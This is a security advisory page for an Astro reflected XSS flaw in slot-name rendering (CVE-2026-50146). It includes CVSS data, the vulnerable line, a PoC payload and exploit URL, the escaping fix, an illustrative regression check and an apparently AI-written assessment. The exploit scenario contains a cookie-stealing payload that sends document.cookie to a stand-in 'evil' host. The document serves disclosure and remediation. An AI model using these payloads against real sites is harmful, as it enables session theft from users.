Astro CVE-2026-50146
Severity (by source): HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
Reflected XSS reachable over the network without auth but needs victim click (UI:R); injected script in app origin yields scope change with limited C/I impact and no availability effect.
Primary rating from GitHub Advisory.
CVSS Vector (GitHub Advisory)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
Blast Radius: 2
Ecosystem impact: 1 npm package depends on astro (1 direct, 0 indirect).
Ecosystem-wide dependent count for version 6.3.3.
Description (GitHub Advisory)
Summary
When a component uses a client:* directive, Astro inserts named slot content into a data-astro-template attribute without HTML escaping the slot name, allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.
This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.
Vulnerable Code
packages/astro/src/runtime/server/render/component.ts:371:376

// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>`

I found that key is interpolated directly into the attribute value without proper escaping.
Proof of Concept
For the PoC, I set up a minimal repository with Astro 6.3.1 and Node.js v26.0.0.

astro.config.mjs

import react from '@astrojs/react';
import node from '@astrojs/node';
import { defineConfig } from 'astro/config';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
integrations: [react()],
});

src/pages/index.astro

---
import Wrapper from '../components/Wrapper.jsx';
const slotName = Astro.url.searchParams.get('tab') ?? 'default';
---
<html><body>
<Wrapper client:load>
<div slot={slotName}>content</div>
</Wrapper>
</body></html>

src/components/Wrapper.jsx

export default function Wrapper() { return null; }

Payload:
abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!--

Accessing this URL will trigger the popup:
http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--
This renders in the HTML as:

<template data-astro-template="abc"></template></astro-island>
<img src=x onerror=confirm(document.domain)><!--">content</template>

Fix
I suggest leveraging the existing escape function on the slot name.

// component.ts:371
`<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>`

---
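The following is an added example, not Astro's code or the reporter's PoC: it models the slot-name interpolation at component.ts:371 before and after the fix and runs a balance check over the rendered markup. escapeHTML is a stand-in for Astro's existing escape helper and templateTagsBalanced is a hypothetical check, both assumptions of this example.

```javascript
// Stand-in for Astro's escape helper (assumption): escape the five characters
// that can change meaning inside HTML text or a quoted attribute value.
const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHTML(str) {
  return str.replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// Vulnerable form (before 6.3.3): the slot name `key` lands inside
// data-astro-template="..." verbatim, so a `"` in it terminates the attribute.
function renderSlotVulnerable(key, html) {
  return `<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${html}</template>`;
}

// Fixed form (6.3.3): the slot name is HTML-escaped first; `"` becomes &quot;
// and `<`/`>` become &lt;/&gt;, so the name cannot leave the attribute value.
function renderSlotFixed(key, html) {
  return `<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${html}</template>`;
}

// Hypothetical regression check for a test suite: a single slot render must
// produce exactly one <template ...> opening and one </template> closing.
// An attribute breakout shows up as extra closings smuggled in via the name.
function templateTagsBalanced(html) {
  const opens = (html.match(/<template\b/g) || []).length;
  const closes = (html.match(/<\/template>/g) || []).length;
  return opens === 1 && closes === 1;
}

// Constructed inputs: a benign slot name and the breakout shape from the advisory.
const BENIGN = 'tab1';
const BREAKOUT = 'abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!--';

function demo() {
  return {
    vulnerableBenign: templateTagsBalanced(renderSlotVulnerable(BENIGN, 'content')),   // true
    vulnerableBreakout: templateTagsBalanced(renderSlotVulnerable(BREAKOUT, 'content')), // false
    fixedBreakout: templateTagsBalanced(renderSlotFixed(BREAKOUT, 'content')),           // true
    fixedDefault: renderSlotFixed('default', 'content'), // no attribute value for the default slot
  };
}
```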
Analysis (AI)
Reflected cross-site scripting in Astro framework (versions prior to 6.3.3) allows remote attackers to inject arbitrary HTML and execute JavaScript in victim browsers when an SSR-rendered page passes user-controlled input as a slot name to a component using a client:* directive. The flaw lives in the server renderer, which interpolates the slot name into a data-astro-template attribute without HTML escaping, enabling attribute-context breakout. …
Vulnerability Assessment (AI)
| Exploitation | Exploitation requires all of the following: the target Astro application runs in SSR mode (output: 'server' with a server adapter such as @astrojs/node), it renders a component using a client:* directive (e.g. … |
| Risk Assessment | The provided CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N (7.1 High) is consistent with a reflected XSS triggered by a victim visiting a crafted URL: network reachable, low complexity, no authentication, user interaction required. … |
| Exploit Scenario | An attacker crafts a URL to an Astro SSR application that maps a query parameter into a slot name, e.g. /?tab=abc"></template></astro-island><img src=x onerror=fetch('https://evil/?c='+document.cookie)><!--, and lures a logged-in victim to click it via phishing or a malicious link. … |
| Remediation | Upgrade the astro npm package to version 6.3.3 or later, which adds HTML escaping of the slot name in packages/astro/src/runtime/server/render/component.ts as described in the GHSA-8hv8-536x-4wqp advisory (https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp). … |
Recommended Action (AI)
Within 24 hours: Identify all web applications running Astro versions prior to 6.3.3 and assess their exposure to user-controlled input in component slots. …
External reference: GHSA-8hv8-536x-4wqp (https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp)